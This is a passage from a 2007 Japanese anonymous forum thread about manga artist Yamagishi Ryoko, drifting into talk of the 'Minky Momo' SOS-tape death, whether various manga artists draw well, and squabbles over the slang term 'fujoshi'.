明るく描くことのできる人なんだけど

122 :花と名無しさん:2007/07/15(日) 21:23:58 ID:???O
>>98は誤爆のようだが、ギシ作品の中なら「夏の寓話」にそんなシーンがあるな。
あの見開きは地味だけど、斧で頭かち割り見開きに並ぶ衝撃シーンだと思った。

123 :花と名無しさん:2007/07/15(日) 21:56:10 ID:???0
>>98は石森のことだと思うよ

124 :花と名無しさん:2007/07/15(日) 22:08:02 ID:???O
石森のあのコマなら手塚が嫉妬しても仕方がない。

125 :花と名無しさん:2007/07/15(日) 22:10:56 ID:???0
>>121
>>117のいうところの山岸っぽさとは
その漫画家志望の方が山岸さん本人っぽいという意味ではなく
山岸作品の登場人物的なかたくなさを抱えた人に思えたって意味では?

しかし何だ
家で一人引きこもり社会派漫画って
そりゃなんつうかなるべくしてなった末路って気がするなぁ


126 :花と名無しさん:2007/07/15(日) 22:14:40 ID:???0
生き様が社会派作品そのものだよなあ

127 :花と名無しさん:2007/07/15(日) 22:30:37 ID:???O
>>125
そうだね、ギシ(マン)っぽいか。ごめん
でもギシマン自体もそんな暗い気もしないんだけどな。

128 :花と名無しさん:2007/07/15(日) 22:30:42 ID:???0
餓死って言うより拒食症か精神の病だったんじゃ?
漫画家じゃないけどマンガヲタの男性でやっぱり好きな本を自費で編集?
していて餓死した人がいる、でもちゃんと親兄弟がいて連絡がつくし
親のほうは心配してたんだよね。
食べ物は1ヶ月くらい食べなくても死なないけど、水を飲まなくなると
短期間で死ぬから。

129 :花と名無しさん:2007/07/15(日) 22:56:16 ID:???0
ヲタが餓死っていったらSOSを思い出すな
ってスレ違いスマソ

130 :花と名無しさん:2007/07/15(日) 22:58:55 ID:???0
なんか依存症だよね。「漫画家になる」という夢に依存し続けた。
多分心のちょっと奥あたりでは自分に才能無いのは気付いてただろうな。
でも他の人生に方向転換する苦しみより、「漫画家をめざす」人生にしがみついちゃった。
新しいこと始めるより今までやってきたことを惰性で続けることの方が楽なときもある。


131 :花と名無しさん:2007/07/15(日) 23:06:48 ID:???0
>>128
今なら何某かの疾患にカテゴライズされたかもね。

132 :花と名無しさん:2007/07/15(日) 23:07:22 ID:???O
>>130 すげー納得した。

133 :花と名無しさん:2007/07/15(日) 23:10:21 ID:???0
>>129
マクロスのテープ残して雪山で死んだヤツか?
ありゃぁ痛がゆかったよ。
同級生と母親をバットで殺傷して、ポケモンカード全部リュックに入れて自転車で東北まで走っていったやつは何か青春を感じたが。


134 :花と名無しさん:2007/07/15(日) 23:13:06 ID:???0
>>130
そしてそこへ
出版社の編集と違い商売気も無ければ
彼女に何の責任も持たない漫画の神が登場して
無邪気なお告げを与えた。

135 :花と名無しさん:2007/07/15(日) 23:19:36 ID:???P
>>133
マクロスじゃなくて、ミンキーモモ

136 :花と名無しさん:2007/07/15(日) 23:24:15 ID:???0
テレプシ、早く再開して欲しいなぁ。
まだ夏。秋は遠いよなぁ…

ミンキーモモって子供向けアニメなのに終盤はかなり悲惨な
話だったよね。当時見ていてかなりショック受けた…

137 :花と名無しさん:2007/07/15(日) 23:30:19 ID:???O
>>130そうだねー
もし手塚先生が彼女の親が希望していたように
漫画家の道を諦めるよう助言をしていたら
彼女は絶望で死を選んでいた気がするし。
死は訪れるべくして訪れたものなんだろうねぇ・・

138 :花と名無しさん:2007/07/15(日) 23:30:20 ID:???0
直接の死因は、熊に襲われたことだったんだよね。
・・・。

139 :花と名無しさん:2007/07/15(日) 23:32:58 ID:???0
>>138
マジで?

140 :花と名無しさん:2007/07/15(日) 23:35:33 ID:???O
>>138そうなの?
遭難したんじゃなくて
最初から自殺目的で山に向かった説もあるよね。
あのSOSテープ自体が胡散臭い(自作自演っぽい)から。

ミンキーモモの終盤は悲惨なのか・・気になるなW

スレ違いすまんね。

141 :花と名無しさん:2007/07/15(日) 23:36:47 ID:???0
>>129
ミンキーモモは痛かったなあ
テープの生声聞いたけど、タースーケーテーと入れたところで何の役に立つのか?と当時疑問だった

142 :花と名無しさん:2007/07/15(日) 23:38:18 ID:???0
自分も「ミンキーモモ男は羆に襲われた形跡がある」との当時のニュースを見た覚えがある

143 :花と名無しさん:2007/07/15(日) 23:39:02 ID:???0
>>138
>>137の漫画家志望の方の直接死因が
熊に襲われたことかと思ったじゃないか

144 :花と名無しさん:2007/07/15(日) 23:40:06 ID:???0
>>140
ミンキーモモの最終回近くの話は悲惨だった。
魔法のアイテムが破壊されて魔法は使えなくなるし、
挙句の果てにモモは交通事故死するんだから…
ラストは希望を持たせたような感じで終るけど、当時は
ショックだったよorz

…この無常さは或る意味ギシズムか?

145 :花と名無しさん:2007/07/15(日) 23:41:05 ID:???0
絵が下手でも「美味しんぼ」みたいに原作に恵まれれば大金持ちになれる道も開けるわけだが

146 :花と名無しさん:2007/07/15(日) 23:41:07 ID:???0
138ですが、熊は本当です。
この事件、発見時は被害者は女性と
骨から判断されたそうです。
当時は今のようにDNA鑑定とかできなかったので。

謎の多い事件で、この事件について検証したサイトで
読みました。
第一報からの新聞記事なども、全て掲載されていました。
被害者が熊に遭遇し追い詰められ、どこで絶命したかまで
詳細に解説されていました。

マスコミから開示の要望があった遺品のノートは、
お父様が公開を拒否したそうです。
当然ですよね。

147 :花と名無しさん:2007/07/15(日) 23:43:14 ID:???0
>>146
サイトのアドレスをプリーズ!


148 :花と名無しさん:2007/07/15(日) 23:44:53 ID:???0
>>熊は本当です。
>>被害者は女性と

ますます混乱してきたぜヒャッハー!

149 :花と名無しさん:2007/07/15(日) 23:46:20 ID:???0
>>145
原作つきは編集以外に更に原作者との打ち合わせもあるわけで
そういう器用さというか柔軟性があれば
もっと早くに芽が出るか別の道探すが出来てるんじゃないかな?

でもどっちみちその人の死は手塚のせいでもなんでもなく
自分が一番望んだことをやりぬいた結果なんじゃないのかなー
山岸漫画の登場人物っぽいというより東電OLっぽい怖さがある
(東電OLが山岸っぽいという話もあるが…)

150 :花と名無しさん:2007/07/15(日) 23:47:48 ID:???0
検索用キーワード

大雪山 旭岳 白樺 SOS 名古屋 会社員 男性 テープ

テープはTDKで、数年間風雪にさらされたものを
TDKの研究所だかが再生できるまでに修復したんだよ。

151 :花と名無しさん:2007/07/15(日) 23:48:36 ID:???O
>>144そんな終わり方だったんか
しかしミンキーモモ男と語り継がれることは
オタにとっては幸せなことなのかもしれないねぇ
山に持って行くってよっぽどだし

152 :花と名無しさん:2007/07/15(日) 23:49:06 ID:???0
TDNとな

153 :花と名無しさん:2007/07/15(日) 23:52:19 ID:???0
>>150d

思えば当時はわけのわからない事件ありました
校庭に謎の9文字とか

154 :花と名無しさん:2007/07/15(日) 23:52:48 ID:???0
>>145
結局漫画はネタが命だよな。
ネタ搾り出すのが自分なのか
他者(原作付)なのかという違いはあれども。

デビュー後、多くの漫画家はそこで苦しむ。

155 :花と名無しさん:2007/07/16(月) 00:01:10 ID:???O
才能だけじゃなく経験が生きるんだろうね>ネタ作り

中学生デビューして注目された人が後にあまり活躍出来ないのは
漫画家という枠に捕らわれすぎて
経験値が低くなってしまった結果なのかもね
ニートしてて良い漫画描ける訳ないよなぁ

156 :花と名無しさん:2007/07/16(月) 00:03:22 ID:/1fhpeC80
>>154同意

逆に言えば絵がど下手でもナニワ金融道やカイジの人や王家の紋章みたいにヒットする
しかしギシ先生のカラー絵の華麗さと手抜きの内容絵のギャップはどう解釈すればいいのか
なにあの舞より上手いペザントの子の不細工っぷりは

157 :花と名無しさん:2007/07/16(月) 00:06:46 ID:???0
ネタが命だけど、そのネタを絵でどう表現するかも重要。
そう考えたら>>156で上げた3人も「絵」は上手い。

158 :花と名無しさん:2007/07/16(月) 00:07:09 ID:???O
なんかだんだん香ばしくなってきた

159 :花と名無しさん:2007/07/16(月) 00:08:34 ID:???0
ごめん、ちょっとアーモンドをローストしてたんだ

160 :花と名無しさん:2007/07/16(月) 00:11:35 ID:???0
漫画はネタだけじゃなくて表現力がものを言うからだよ。
だから絵だけうまければ原作もらえば描けるわけでもない。
もちろんネタの面白さもあれば尚いいけど、つまらないことをいかに面白く
見せるかとか、これは文字で作品書く場合にも言えるけど。
だからネタだけでヒットとばしたものの、その後が続かない作家とかもいるじょない。

161 :花と名無しさん:2007/07/16(月) 00:12:54 ID:???0
絵はヘタウマ系だけど、ネタが良くてガロデビューしたけど結局死んじゃった山田花子みたいなマンガ家もいるしね。
ヘタウマ漫画家にありがちなことに割りと可愛い人だったけど。全く可愛けりゃ人生勝利なんてことはないよなあ。

絵描きとしては一見ヘタそうに見えても上であがってる酌婦マンガ家よりも細川千栄子やカイジの人の方がかなり才能あると思うが。
細川千栄子は若い頃はギシセンセが憧れるほど華麗な絵だったらしいよ。


162 :花と名無しさん:2007/07/16(月) 00:13:13 ID:???O
タイトルしか知らなかった「ミンキーモモ」をウィキで見て、
その頃多くのアニメではスポンサーに
「名作なんて言われなくていいんです、30分のCMだと思ってください」と
言われてたと読んで悲しくなってしまった。
アニメってどうせ昔のだともーっと昔の方がおもしろくない?
萌えはないけどさ。

163 :花と名無しさん:2007/07/16(月) 00:14:54 ID:???O
デスノの人は原作者に恵まれてるよな〜。

個人的にはサイボーグGちゃんも好きだけどねw
あやつりナントカはつまらん。

164 :花と名無しさん:2007/07/16(月) 00:21:32 ID:???O
あとドラゴン桜の人は絵のリアリティを捨てて
話の面白さを追求してるらしい。
デッサンは酷いんだけどねw

165 :花と名無しさん:2007/07/16(月) 00:27:59 ID:???0
捨ててっていうか
それしかできないんじゃ


166 :花と名無しさん:2007/07/16(月) 00:28:24 ID:???O
サイモンフミも「自分にとって絵そのもののよさは
大げさに言うとどうでもいい、話を説明するためのもの」っつってた

167 :花と名無しさん:2007/07/16(月) 00:31:29 ID:???0
デスノの人はイラストレーターでも食ってけるでそ
ジャンプノベルズの挿絵見たけど、他の漫画家の挿絵のレベルとは格が違うというか

絵が下手なのに億万長者になったといえばさくらももこ以上の漫画家はないでしょう

168 :花と名無しさん:2007/07/16(月) 00:35:19 ID:???O
>>165
受験漫画なのにハブとマングースの闘いを本気で背景に描いたり
「悪魔のような教育ママ」を文字通り絵に表してるんだよw
そういうリアリティを排除してるって意味ね。

169 :花と名無しさん:2007/07/16(月) 00:47:44 ID:???O
アニメーター系イラストレーター系の人の漫画は絵だけ上手くてつまらないのが多いな。
貞本エヴァとか山田章博とか。綺麗なんだけど漫画になってないというか……

あとミンキーモモの芦田豊雄とかねw
この人はコラムが面白くて80年代のオタクのカリスマだったけどw

170 :花と名無しさん:2007/07/16(月) 00:48:46 ID:???0
>>168
主人公が落ち込んでるって時の表現が、
地面の下から上を見たアングルで描かれてて
すげえってまじ感心した

171 :花と名無しさん:2007/07/16(月) 00:59:13 ID:???O
>>170
あと「墓穴を掘る」図が本当に主人公が墓を掘ってる絵でワラタw

172 :花と名無しさん:2007/07/16(月) 01:04:40 ID:???0
そろそろ他の作家の話は終わりにしてほしい・・・・・・

173 :花と名無しさん:2007/07/16(月) 01:05:16 ID:???0
>>169
そうか?山田章博はアレだが貞本は普通にマンガうまいと思うぞ。
少なくとも池上遼一よりは躍動感があるぞ。





174 :花と名無しさん:2007/07/16(月) 01:11:51 ID:???O
>>172
うん…分かんないし。あんまり。

175 :花と名無しさん:2007/07/16(月) 01:18:54 ID:???0
>>173
池上遼一は小池せンせと組んだときに力を発揮する───ッ

176 :花と名無しさん:2007/07/16(月) 01:24:20 ID:???0
でもあがってんのはギシ絵とペンのラインの似たマンガ家と
作風に親和性のある作家が多いよね。やっぱりギシファンの読むマンガは共通してんのな。
芦田豊雄はともかく。

177 :花と名無しさん:2007/07/16(月) 02:00:54 ID:???O
ITとタスナ殿って顔似てない?

178 :花と名無しさん:2007/07/16(月) 02:04:20 ID:???O
>>176
漫画好きが揃ってるって感じだよねw

179 :花と名無しさん:2007/07/16(月) 02:06:29 ID:???0
>>172
いいかげんスレ違いだね。
途中から熱心にロムってて、ここがギシスレだって忘れて
「あ、ギシ先生の名前出てきた」と思ってしまった。

180 :花と名無しさん:2007/07/16(月) 05:39:02 ID:???O
たすなどのって嶋タンとこにいたオサン?

181 :花と名無しさん:2007/07/16(月) 07:42:01 ID:???O
>>180
嶋タンとこにいたというか、兄貴だろw

182 :花と名無しさん:2007/07/16(月) 08:26:52 ID:???O
超ギシファンですが
世代が違うのか
さっきから出てきた漫画家一人もわからんのだけど、(池上遼一だけわかった)
墓穴の絵描いた人って誰?
すっごく見てみたいんですけど…
(最後にお願いします)

183 :花と名無しさん:2007/07/16(月) 08:37:17 ID:???0
>>167
さくらももこが絵が下手…?
色使いもぬりえレベルだとでも…?

ギシ先生を語りたいなら
今なら鬼女板だw

184 :花と名無しさん:2007/07/16(月) 09:55:28 ID:???0
>>183
さくらももこが絵が上手…?
色使いもぬりえレベルではないとでも…?



185 :花と名無しさん:2007/07/16(月) 10:02:00 ID:???0
>>166
ギシ先生もそれっぽいよね。
美しさを強調=説明したいカットは
力いれて描くけど、その他は
何をしているところか伝わればいいって感じ。
自分はそういう潔さは嫌いじゃない。


186 :花と名無しさん:2007/07/16(月) 10:24:28 ID:???0
サイモンフミはマンガ読者はレベル低いから小説かくとか言った人だしなぁ。
その発言も自分の絵がそれほどうまくはないからいいわけしてんのって気がする。




187 :花と名無しさん:2007/07/16(月) 10:29:09 ID:???0
さくらももこの絵はふつーに上手いよ
全盛期のカラーページとか、画集がほしいと思ったくらいだし。

お話がダメになったあたりから、絵もダメになったね。
大金を手にしたのが悪かったのか・・

結婚して、編集者のだんなとアニメの脚本書いてる頃が全盛期かな・・
離婚したあたりから、すっかりダメになった。

188 :花と名無しさん:2007/07/16(月) 11:22:54 ID:???O
概出かもだけど
ちょっと前にハトシェプストのミイラが発見されたみたいだね。

189 :花と名無しさん:2007/07/16(月) 11:35:10 ID:???O
>>188
その話はミクシーですると良いよ。

190 :花と名無しさん:2007/07/16(月) 11:46:08 ID:???O
>>187
さくらももこの絵はうまいんだけど
あんまり絵を見ない人に拙い絵と言われやすいのはわかる

191 :花と名無しさん:2007/07/16(月) 11:56:08 ID:???0
さくらももこのカラー原画を今はなき渋谷の三省堂の
漫画屋で見たことがあるけど、色の塗り方とか本当に
丁寧で綺麗だったよ。

いわゆる絵が上手な人ではないけど、原画の
完成度は素晴らしかった。

192 :花と名無しさん:2007/07/16(月) 12:00:56 ID:???0
こんな絵誰でも描けると思わせて、実は描けない>さくらももこ
緻密なカラーを見れば、素人には無理だってことがわかるだろうけど。

たしかに、デスノートの人と比べれば「巧くない」かもしれないけど
いろんなタイプの絵があっていいし。

ギシ先生の場合は
うまい絵なのか、そうでもないのか
長年のファンなのに、今だにわかりません。

今朝から封印の3巻を読み始めたけど、やっぱりおもしろいわ。

193 :花と名無しさん:2007/07/16(月) 12:02:04 ID:???0
おーなり由子の良い影響をたくさん受けたって感じ>さくら

194 :花と名無しさん:2007/07/16(月) 12:14:01 ID:???O
じゃあ上の方で言われてる「絵が下手なのに話の面白さで売れてる漫画」という例は
誰が一番最適なのか。
少女漫画ではいないかな?

195 :花と名無しさん:2007/07/16(月) 12:23:54 ID:???0
>>194
自分の中ではよしながふみかなー
一見それらしい絵を描いてはいるが
実はものすごい下手だと思う

196 :花と名無しさん:2007/07/16(月) 12:29:47 ID:???0
>>194

きせかえユカちゃん
とか
ひまわりっ
を、描いてる人

ネームの面白さはピカイチで
絵も下手なようで、誰にも描けない絵だと思う。

さくらももこの二の舞にだけはなってほしくない。

197 :花と名無しさん:2007/07/16(月) 12:39:53 ID:???0
ギシ先生は漫画家になりたくてなりたくてなった人だから
(流々草花って漫画エッセイ読んでつくづくそう思った)
やっぱり漫画という表現方法に一生拘ると思う

カラーイラストなどはストーリーとは別で楽しんで描かれているのでは
青池さんも「エロイカより愛をこめて」の創り方でその楽しさを書かれていたし

198 :花と名無しさん:2007/07/16(月) 13:04:32 ID:???0
さくらももこは何かの本で影響を受けた絵の人がいるっていってたよ。
外人の男性。さくら絵でよくあるどこかの国のような絵とかそんな雰囲気。(あくまで雰囲気だけ)
もうその人は死んでしまったらしい。

山岸先生の漫画絵抜きの本格的な仏教画を見てみたいな。処天なんて馬宿の部分消せば
そのまま仏教画に使えそうなのもあるしw

199 :花と名無しさん:2007/07/16(月) 13:05:35 ID:???O
>>194
遠藤淑子!!
話はいいと知っていても棚に戻してしまいます。

200 :花と名無しさん:2007/07/16(月) 13:09:05 ID:???0
>>190の絵の嗜好が知りたいw

丁寧=上手いではない
鳥山明が上手いと言うのはわかるし岡崎京子がうまいというのもわかる
ただ「キティちゃん最高!」てな趣味の人にはさくらは至上の画家なんだろうなと思う

201 :花と名無しさん:2007/07/16(月) 13:14:22 ID:???0
>>186
それサイモンの負け惜しみだと思われ

絵の表現と文章の表現は別ものだからねえ
コマ割りとか画面構成が上手かったのは全盛期の竹宮恵子か?

202 :花と名無しさん:2007/07/16(月) 13:17:51 ID:???0
>>200

漫画しか読んだことないんだね・・

図書館へ行って、いわゆる「絵画」の画集を眺めてみなよ。
あなたでも描けそうな気がする巨匠の絵がたくさん載ってるから。

巧いだけの人なら美大に行けばごろごろいるわけで、
巧くないけど、見て「ピン!」とくる絵というのはあるんだよ。

203 :花と名無しさん:2007/07/16(月) 13:21:08 ID:???0
しかし山岸スレでさくらももこの話題で紛糾!って
はたから見りゃ意外だろうなぁw

上手い絵と人を惹きつける絵は別物だってだけの話でしょう
ほらあれだ、美人じゃないがもてる女

204 :花と名無しさん:2007/07/16(月) 13:21:10 ID:???0
>>200の絵の嗜好も知りたい

205 :花と名無しさん:2007/07/16(月) 13:26:07 ID:???0
>>199
あー、遠藤淑子な…
あれで話が面白くなきゃあの画風でプロになれるはずないってことだろうなw

自分はTONOさんかなー
下手っつうか手抜き?
台詞や世界観は独特の乾いた感じがしてすごい好きなんだが

206 :花と名無しさん:2007/07/16(月) 13:26:34 ID:???0
鳥山は画力あるよ。
怪力眼鏡っ娘が軽く岩を飛ばして遠くの山の頂き付近がぽきんと折れる。
これが一コマでわかるんだぜ

>>202
まぁ訓練ではどうにも出来ない部分は確かにあるよな。
確かなデッサンがセンスを裏打ちしている事はままあるが。

207 :花と名無しさん:2007/07/16(月) 13:27:07 ID:???0
>>204
鳥山明とか岡崎京子って描いてあるよ

>ただ「キティちゃん最高!」てな趣味の人にはさくらは至上の画家なんだろうなと思う

悪意ゆんゆん

208 :花と名無しさん:2007/07/16(月) 13:29:05 ID:???0
>>200の悪意撒き散らしっぷりは鬼女

209 :花と名無しさん:2007/07/16(月) 13:31:53 ID:???0
>>197
エロイカで少佐がメモ用紙に描いた本当に下手糞な絵がワロタ。
あれは下手に絵心あると難しい。

ギシは猫とかも上手だよね。
モメンたんとかには頭蓋骨を感じる。


210 :花と名無しさん:2007/07/16(月) 13:32:39 ID:???0
物を食べる描写なら藤子F不二雄が最強。
メロンを食べる擬音が「シャクシャク」なんだぜ?

211 :花と名無しさん:2007/07/16(月) 13:35:50 ID:???0
さくらももこの絵がマンガとしてうまいかっつーと微妙だとは自分も思う。
似た作風の西原とか、エビスヨシカズとかと比べてもマンガ絵としてはかなり落ちるような。
ダメンズウォーカーの作者にはないアートなセンスがあったというか。
そういやぁいたじゃん、ダメンズウォーカーの絵は間違いなくヘタだが、内容で売れた。




212 :花と名無しさん:2007/07/16(月) 13:38:48 ID:???0
>>210
美味しいさを思い出しながら描いてるんだろうな…
キャベツのお味噌汁、尻尾までアンコの詰まった熱々の鯛焼き、
出版社の地下食堂の天丼。

ギシとは違う方向での美味しさ表現だわな。
ギャートルズに近いかも。

213 :花と名無しさん:2007/07/16(月) 13:43:55 ID:???0
>>210
シャクシャク…
メロンじゃなくスイカっぽい音だなw


214 :花と名無しさん:2007/07/16(月) 13:45:53 ID:???O
確かに倉田真由美は下手すぎだなー面白いけど。
TONOは好き、味あるし可愛い絵柄。
だが妹のうぐいすみつるは下手だなぁ…単行本出すレベルじゃない

215 :花と名無しさん:2007/07/16(月) 14:09:40 ID:???0
クラタマは
自分はそのうち小説を書くから
絵なんかうまくならなくてもいいんだ
とか、言ってるし

TVに写ったら、そくチャンネルをかえることにしてる

216 :花と名無しさん:2007/07/16(月) 14:41:45 ID:???0
>>214
うぐいす姉妹は、画風が同じでデッサン力も多分ほぼ同じなのに、センスの差で違いが出てしまった
珍しい例だ。
他の兄弟漫画家はそんなことないのにな。

 ギシセンセの絵は線はともかくページ構成含めると似てる人とかほんといないよな。


217 :花と名無しさん:2007/07/16(月) 14:47:15 ID:???0
>>216
萩尾さんや大島さんのフォロワーは結構いたのにね
高野文子なんかアマ時代の絵は萩尾さん○パクだったw
今は面影ないけどね

一時の吉田秋生が最も露骨なフォロワーだったか

218 :花と名無しさん:2007/07/16(月) 14:55:37 ID:???0
亀だけど
SOS事件の事かいてくれた人ありがとう
子供の頃台風が来たぐらいの時期に
こんな事件あったよなーと漠然と思い出して
2ちゃんでたずねてみようと思ってたら
こんなところで出くわした

219 :花と名無しさん:2007/07/16(月) 14:58:51 ID:???0
すげぇ、亀がPC使ってる

220 :花と名無しさん:2007/07/16(月) 15:03:21 ID:???O
いんだよ細

221 :花と名無しさん:2007/07/16(月) 15:12:13 ID:???0
千花乙

222 :花と名無しさん:2007/07/16(月) 15:18:00 ID:???O
虎だけど、山岸先生が山月記描いたら面白いと思う?

223 :花と名無しさん:2007/07/16(月) 15:18:25 ID:???0
ツマンネ

224 :花と名無しさん:2007/07/16(月) 15:19:52 ID:???0
これか?
http://www.chanbara.jp/sos/

225 :花と名無しさん:2007/07/16(月) 15:29:54 ID:???0
絵はうまくないけど漫画がおもしろい少女漫画家
ってお代は難しかった
結局絵が汚いと少女漫画は難しいのだ

絵はうまいが、ニュアンスは合ってる気がする答え
朝倉世界一

226 :花と名無しさん:2007/07/16(月) 15:46:12 ID:???0
川原泉は昔は絵はそこそこで話が面白かったけど
今は絵はコピー切り貼りの多用、話も昔ほどは面白くない

あとは明智抄かな

227 :花と名無しさん:2007/07/16(月) 15:56:27 ID:???0
川原泉は人物の顔が現代向けに変えたんだかどうかだ
前のほうがよかった。

あと、進学校で恋愛に疎い主人公というのも
彼女の読者と被るのかもしれないけど
いい加減、うんざりぎみ・・

228 :花と名無しさん:2007/07/16(月) 16:02:38 ID:???O
酷い時のギシは本当に酷いよね…。

229 :花と名無しさん:2007/07/16(月) 17:54:13 ID:???0
ペン入れ出来てればOkなんだぜ

230 :花と名無しさん:2007/07/16(月) 18:42:44 ID:???O
そんなの冨樫くらいだ。

231 :花と名無しさん:2007/07/16(月) 18:55:23 ID:???0
ヒストリエ

232 :花と名無しさん:2007/07/16(月) 19:01:34 ID:???0
最近じゃ成田美名子も結構すごい原稿載せてたな
主線はペン入ってるけど本当にそれだけ
多分コミックスになるとき完全版になるんだろうが
あれだけ一世を風靡した作家が…と思ってちょっとびっくりした

233 :花と名無しさん:2007/07/16(月) 19:13:44 ID:???0
今の岡野玲子なんかは絵はいいんだけどそれだけだもんな
あれはもう漫画ではない

234 :花と名無しさん:2007/07/16(月) 19:19:20 ID:???0
>>227
川原泉の薀蓄の類は似非インテリめいた無理を感じるけどな

235 :花と名無しさん:2007/07/16(月) 19:22:09 ID:???0
>>233
岡野玲子はファンシーダンスが面白かった。

236 :花と名無しさん:2007/07/16(月) 19:31:03 ID:???0
>>232
成田さんは、非常に真面目で、神経質なまでに几帳面な人だと
思っていたので、それは意外だ。そうせざるを得ないなにかがあったのかな?

237 :花と名無しさん:2007/07/16(月) 19:33:20 ID:???0
しかし最近の作家では絵はダメだけど話が面白い人って少ないんだな。
よくない傾向だ。
ドヘタだけど子供にはこぎれいに見えるかもって絵は昔からあるからいいけどさ。

238 :花と名無しさん:2007/07/16(月) 19:35:28 ID:???0
>>236
お父さんの看病をしながらの原稿だったとか。
亡くなられてしまったそうだけど。

239 :花と名無しさん:2007/07/16(月) 20:00:52 ID:???O
>>237
そうなんですよ。
「絵が汚らしい、読みにくい」って理由で名作を読んでもらえない。
マンガを文庫サイズってもともと無理があると思う。
まして実際ペンで影つけてたような昔の劇画なんて読めたもんじゃない。
もったいない。

240 :232:2007/07/16(月) 20:04:27 ID:???0
>>238
あ、そういう理由があったのか
それは事情も知らないで失礼を言った

241 :花と名無しさん:2007/07/16(月) 20:10:28 ID:???O
絵が汚くて読んでもらえない名作と言ったら水木さんとかか。

文庫になってる鬼太郎とか見たことないけど、あの書き込みや点描は文庫じゃ潰れそうだなぁ。
まして鬼太郎はアニメのイメージのが強いし。


藤子Aもそうかも。

242 :花と名無しさん:2007/07/16(月) 21:32:25 ID:???0
>>202さくらももこが腐女子以外からは賛美されない件に関して無視ですかw

まあファンタが至上の味だと思ってる時代はある罠w

243 :花と名無しさん:2007/07/16(月) 21:39:58 ID:???O
>>242
日本語でおk

244 :花と名無しさん:2007/07/16(月) 22:04:42 ID:???0
>>242
チュプ乙

245 :花と名無しさん:2007/07/16(月) 22:08:13 ID:???O
>>242
ファンタが至上の味の時代についてkwsk

246 :花と名無しさん:2007/07/16(月) 22:34:15 ID:???0
すっかりギシスレじゃなくなったね

247 :花と名無しさん:2007/07/16(月) 22:37:00 ID:???0
ギシギシしてるからおk

248 :人多すぎ解禁?:2007/07/16(月) 22:38:07 ID:???0
わ〜わたしたち、なんにちかぶりでスレをみられたね〜

249 :花と名無しさん:2007/07/16(月) 22:53:53 ID:???0
>>94
もしかして、
工場で働きながらコツコツ漫画描いていて若死にしちゃった女性のことかな?
なんでプロでもないのに、こんな記事が載ってるんだろうと思って、
違和感あったのだが・・・。

250 :花と名無しさん:2007/07/16(月) 22:57:54 ID:???O
>>242はおもしろい人だw
でも>>242における「腐女子」の意味合いはよくわからないや。

251 :花と名無しさん:2007/07/16(月) 22:59:44 ID:???0
>>128
もしかして別冊宝島(タイトル忘れたがオタクの特集)に載ってたアニオタのこと?
かがみあきら♪もなんか若くして突然死したみたいだし・・・。

252 :花と名無しさん:2007/07/16(月) 23:10:20 ID:???0
>>149
原作者と絵描きはあんまりないらしいぞ。
お互いのメジャー度もあるけど、基本、原作者>絵描き。
原作者が駆け出しなら編集者のチョイスで描き手が選ばれる、
原作者がそこそこ人気作家なら自分で絵描きを指名できる。

253 :花と名無しさん:2007/07/16(月) 23:15:57 ID:???0
>>155
里中満智子とか美内すずえとか、昔は学生デビュー多かったよね。
あとは楠桂とか羅川真里茂とか?
社会経験なくても頭が良ければ続く・・・ってカンジか?

254 :花と名無しさん:2007/07/16(月) 23:16:57 ID:???O
規制解除のせいか一気に遅レスが噴き出してるな

255 :花と名無しさん:2007/07/16(月) 23:31:28 ID:???O
>>209
木綿に頭蓋骨と見て
何故か豆絞りの手ぬぐいのお化けを思い出した。

たしかにデッサンの授業で石膏にああいう風に布かぶせて面取りの勉強したよなぁとかw

256 :花と名無しさん:2007/07/16(月) 23:32:28 ID:???0
>>250
2ちゃんにおける「腐女子」とは、「自分が気に食わない奴」のことです
これを口にするのは男であることが多いですが、女の場合もないわけではありません

257 :花と名無しさん:2007/07/16(月) 23:35:47 ID:???0
と、腐女子が言っています

258 :花と名無しさん:2007/07/16(月) 23:37:13 ID:???0
個人的な感想だが、腐女子は「やおい二次元を愛する女子」という
意味に限定して使ってほしいね。
やおいもたまに「やまなしおちなしいみなし」の意味そのままに
使う人がいるが、あくまでやおいはパロディのボーイズラブだと
主張したいね。


259 :花と名無しさん:2007/07/16(月) 23:37:16 ID:???0
>>256>>242で、女であることが判明しました。

260 :花と名無しさん:2007/07/16(月) 23:44:33 ID:???0
>>256
あー、その解釈は納得出来るなw

何かもうどの板行ってもどこでも相手を罵る言葉が「腐女子」なもんで
なんでこの場でこの流れで腐女子…?と思うことは多々あった

男ってほんとに自分が(妄想上でも)
性的に搾取される側になるのを恐怖してるよなー
そのビビり方が微笑ましいw


261 :花と名無しさん:2007/07/16(月) 23:49:07 ID:???0
>>260
よう腐女子!

262 :花と名無しさん:2007/07/16(月) 23:49:52 ID:???0
腐女子というと、「801大好き女、同人女」
をイメージする。同人誌の読者も含む。
そこから派生して、
同人女っぽい発想の人やディープなオタク女、
801好き女と同程度の痛さで男子にハァハァしたり妄想を膨らませたりする女
も加わったってかんじ。

263 :花と名無しさん:2007/07/16(月) 23:52:09 ID:???O
>>256
>>242はその用法ではないっぽいじゃないですか。
まあもういないみたいだし変だしいいけど

264 :花と名無しさん:2007/07/16(月) 23:54:37 ID:???0
>>260はよほど腐女子と言われる機会が多いのだろうか



265 :花と名無しさん:2007/07/17(火) 00:00:46 ID:???0
山岸漫画の話題の少ないこと。

266 :260:2007/07/17(火) 00:00:50 ID:???0
>>264
ああ、自分が言われるってのじゃないw
大体書き込みなんかするのここくらいだし

いや人を罵るときにちょっと前なら池沼ってのが多かったと思うんだが
今じゃどこの板でも腐女子腐女子だからさぁ
もうホモもオタクも関係ない感じなので「?」と思っててさ

267 :花と名無しさん:2007/07/17(火) 00:03:19 ID:???0
せいてきにさくしゅとかむずかしいです><

268 :花と名無しさん:2007/07/17(火) 00:03:25 ID:???0
>>260はなんとなく腐女子っぽさがあるんだな。
801好き女と同程度のヲタクっぽさが感じられるからなのかな。

269 :花と名無しさん:2007/07/17(火) 00:04:33 ID:???0
>>267
難しいというより、キモイと思った。

270 :花と名無しさん:2007/07/17(火) 00:08:00 ID:???0
>>266
どこの板でもというが、自分が行く板では
ほとんど腐女子って言葉を見かけないんだが。
>>266自身が自覚してない腐女子で、
腐女子が好みそうな板ばかり覗いているせいじゃないか。

271 :花と名無しさん:2007/07/17(火) 00:11:26 ID:???0
では満場一致で>>260を腐女子と認定します

272 :花と名無しさん:2007/07/17(火) 00:13:29 ID:???0
ご苦労!

273 :花と名無しさん:2007/07/17(火) 00:15:16 ID:???O
自分も「腐女子」と煽る板をあまり見たことがない。
オタ男が集まりそうな板で見られる表現なのかな?

274 :花と名無しさん:2007/07/17(火) 00:15:50 ID:???0
ヴィリの話題少ないね。
盛り上がったのは、ヴィクトリアの話題くらいかw
